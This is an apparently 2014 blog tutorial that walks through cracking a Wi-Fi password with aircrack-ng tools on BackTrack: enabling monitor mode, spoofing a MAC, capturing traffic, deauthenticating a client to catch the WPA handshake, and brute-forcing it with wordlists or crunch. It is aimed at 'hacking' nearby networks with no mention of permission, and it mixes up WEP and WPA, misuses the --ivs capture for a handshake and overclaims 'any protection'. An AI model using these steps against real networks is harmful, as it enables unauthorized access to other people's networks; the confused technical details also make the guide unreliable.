Learn to hack wifi.. (any protection)

Posted by Unknown Selasa, 04 Februari 2014 0 komentar


So, guys.. ready to start the wifi hacking tutorial?.. here it begins..
 First of all download backtrack 5 r3 from here- backtrack 5 r3
Then make  a bootable thumb drive using rufus v1.43. rufus v1.30 (even if it is an old version.. update it.)
rufus is one of the best software to make a bootable pen drive.

Now the real fun begins

When the os is loaded.. write startx  to enter the graphical mode.


  • Now your all set to go...just simply follow below steps...now  


Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads
    • I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

     Steps to Follow:
    Step 1 :
    airmon-ng

    The result will be something like :
    Interface    Chipset      Driver
    wlan0        Intel 5100   iwlagn - [phy0]



    Step 2 :
    airmon-ng start wlan0

    Step 3 (Optional) :

    Change the mac address of the mon0 interface.
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up


    Step 4 :
    airodump-ng mon0

    Then, press "
    Ctrl+c" to break the program.

    Step 5 :
    airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

    *where -c is the channel
               -w is the file to be written
               --bssid is the BSSID

    This terminal is keeping running.

    Step 6 :

    open another terminal.
    aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

    *where -a is the BSSID
               -c is the client MAC address (STATION)

    Wait for the handshake.

    Step 7 :

    Use the John the Ripper as word list to crack the WPA/WP2 password.
    aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

    Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

    If you do not want to use John the Ripper as word list, you can use Crunch.

    Go to the official site of crunch.
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

    Download crunch 3.0 (the current version at the time of this writing).
    http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
    tar -xvzf crunch-3.0.tgz
    cd crunch-3.0
    make
    make install

    /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

    *where 
    8 16 is the length of the password, i.e. from 8 characters to 16 characters.

    That's all folks.. enjoy and remeber to follow my blog..

    TERIMA KASIH ATAS KUNJUNGAN SAUDARA
    Judul: Learn to hack wifi.. (any protection)
    Ditulis oleh Unknown
    Rating Blog 5 dari 5
    Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke https://androidblackberries.blogspot.com/2014/02/learn-to-hack-wifi-any-protection.html. Terima kasih sudah singgah membaca artikel ini.

    0 komentar:

    Posting Komentar

    Trik SEO Terbaru support Online Shop Baju Wanita - Original design by Bamz | Copyright of android blackberry.